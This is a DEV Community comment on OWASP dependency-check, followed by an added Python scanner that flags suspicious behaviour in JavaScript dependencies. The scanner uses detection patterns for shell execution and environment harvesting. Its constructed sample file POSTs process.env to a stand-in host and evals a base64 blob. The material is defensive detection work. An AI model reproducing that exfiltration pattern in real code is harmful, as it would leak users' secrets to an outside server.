DEV Community

Discussion on: Checking your project dependencies for vulnerabilities

Thomas Werner • Edited

I use the Gradle plugin of the OWASP dependency checker as part of the build process of a Java web application project. It works fine, but it can drastically slow down the build process when it downloads the latest exploit database updates. Nice to see that they also added support for Node.js.

The biggest problem with it (and perhaps also snyk.io?) is that it doesn't perform any code analysis for unreported problems and malicious code. It appears it only checks package names and version numbers against the NVD database of known security vulnerabilities.

I wish there was something like a malware scanner out there for going through all dependencies and looking for red flags (e.g. code obfuscation, certain URLs, HTTP requests where there shouldn't be any, etc.). I would even take the occasional false positive into account just to make sure no one mines bitcoins on my server or steals credit card data :-/
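The kind of red-flag scan the comment above asks for, as an added example that is not code from the post, from OWASP dependency-check or from snyk. The distinction the commenter draws is real: dependency-check identifies each artifact from its metadata, maps it to a CPE and looks up known CVEs in the NVD, so a freshly backdoored release that no one has reported yet passes cleanly. The script below instead greps a package tree for behaviour most libraries have no reason to exhibit: install hooks in package.json, eval, shell or network access, environment harvesting, hex-escape obfuscation, high-entropy string blobs and URLs to hosts outside an allowlist. The indicator list, thresholds, allowed-host set and the three sample files are assumptions and constructed inputs, not real packages.

```python
"""Heuristic red-flag scanner for third-party JavaScript packages.

Added example, not code from the DEV post, OWASP dependency-check or snyk.
Indicators, thresholds and ALLOWED_HOSTS are assumptions to tune per project;
the sample files at the bottom are constructed, not real packages.
"""
import json
import math
import os
import re
import tempfile
from collections import Counter
from typing import Dict, List

CODE_INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("dynamic-function", re.compile(r"\bnew\s+Function\s*\(")),
    ("shell-exec", re.compile(r"child_process|\bexecSync\s*\(|\bspawn\s*\(")),
    ("network", re.compile(r"require\(\s*['\"](?:https?|net|dgram)['\"]\s*\)|\bfetch\s*\(|XMLHttpRequest")),
    ("base64-decode", re.compile(r"\batob\s*\(|Buffer\.from\([^)]*['\"]base64['\"]")),
    ("charcode-build", re.compile(r"String\.fromCharCode")),
    ("env-harvest", re.compile(r"process\.env\b")),
    ("mining-pool", re.compile(r"stratum\+tcp://")),
]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
HEX_ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}")
LONG_STRING_RE = re.compile(r"['\"]([^'\"\n]{40,})['\"]")
ALLOWED_HOSTS = {"github.com", "www.npmjs.com", "registry.npmjs.org"}  # assumption
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
HEX_ESCAPE_THRESHOLD = 20  # assumption: this many \xNN escapes in one file
ENTROPY_THRESHOLD = 4.5    # bits/char; prose is ~4.1, base64/random blobs ~5-6


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def _finding(path, text, pos, rule, evidence):
    return {"path": path, "line": text.count("\n", 0, pos) + 1, "rule": rule, "evidence": evidence}


def scan_js(path: str, text: str) -> List[Dict]:
    found = []
    for rule, rx in CODE_INDICATORS:
        found += [_finding(path, text, m.start(), rule, m.group(0)) for m in rx.finditer(text)]
    for m in URL_RE.finditer(text):  # any host not on the allowlist is worth a look
        if m.group(1).lower() not in ALLOWED_HOSTS:
            found.append(_finding(path, text, m.start(), "unknown-url", m.group(0)))
    hexes = list(HEX_ESCAPE_RE.finditer(text))  # strings built from \xNN escapes
    if len(hexes) >= HEX_ESCAPE_THRESHOLD:
        found.append(_finding(path, text, hexes[0].start(), "hex-escapes", f"{len(hexes)} escapes"))
    for m in LONG_STRING_RE.finditer(text):  # base64 payloads, packed code
        h = shannon_entropy(m.group(1))
        if h > ENTROPY_THRESHOLD:
            found.append(_finding(path, text, m.start(), "high-entropy-string", f"{h:.2f} bits/char"))
    return found


def scan_package_json(path: str, text: str) -> List[Dict]:
    # Lifecycle scripts run arbitrary commands at install time, before any review.
    scripts = json.loads(text).get("scripts", {})
    return [{"path": path, "line": 1, "rule": "install-hook", "evidence": f"{k}: {v}"}
            for k, v in scripts.items() if k in INSTALL_HOOKS]


def scan_tree(root: str) -> List[Dict]:
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == "package.json":
                found += scan_package_json(full, text)
            elif name.endswith((".js", ".cjs", ".mjs")):
                found += scan_js(full, text)
    return found


BENIGN_JS = """\
// constructed sample: a harmless padding helper
"use strict";
module.exports = function leftPad(str, len, ch) {
  str = String(str);
  ch = ch || " ";
  while (str.length < len) str = ch + str;
  return str;
};
"""
SUSPICIOUS_JS = """\
// constructed sample: behaviour no padding helper needs
const cp = require("child_process");
const https = require("https");
const payload = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
const host = "\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x6f\\x72\\x2e\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65\\x2e\\x6e\\x65\\x74";
https.request("https://collector.example.net/upload", { method: "POST" }).end(JSON.stringify(process.env));
eval(Buffer.from(payload, "base64").toString());
"""
PACKAGE_JSON = '{"name": "pad-ish", "version": "1.0.0", "scripts": {"postinstall": "node index.js"}}'


def demo() -> List[Dict]:
    # Lay the constructed package out like one node_modules entry and scan it.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "lib"))
        for rel, body in [("package.json", PACKAGE_JSON), ("index.js", SUSPICIOUS_JS), ("lib/pad.js", BENIGN_JS)]:
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['rule']:<20} {f['path']}:{f['line']}  {f['evidence']}")
```

Run it as `python scanner.py` to see the constructed package flagged nine times (one install hook plus eight hits in index.js) while lib/pad.js stays silent; point `scan_tree()` at a real node_modules directory to triage actual dependencies. Every rule here is a heuristic, so expect false positives (a legitimate HTTP client will trip "network", a minified bundle will trip the entropy check); the value is a short, reviewable list of files that deserve human eyes, which is exactly what an NVD lookup cannot give you.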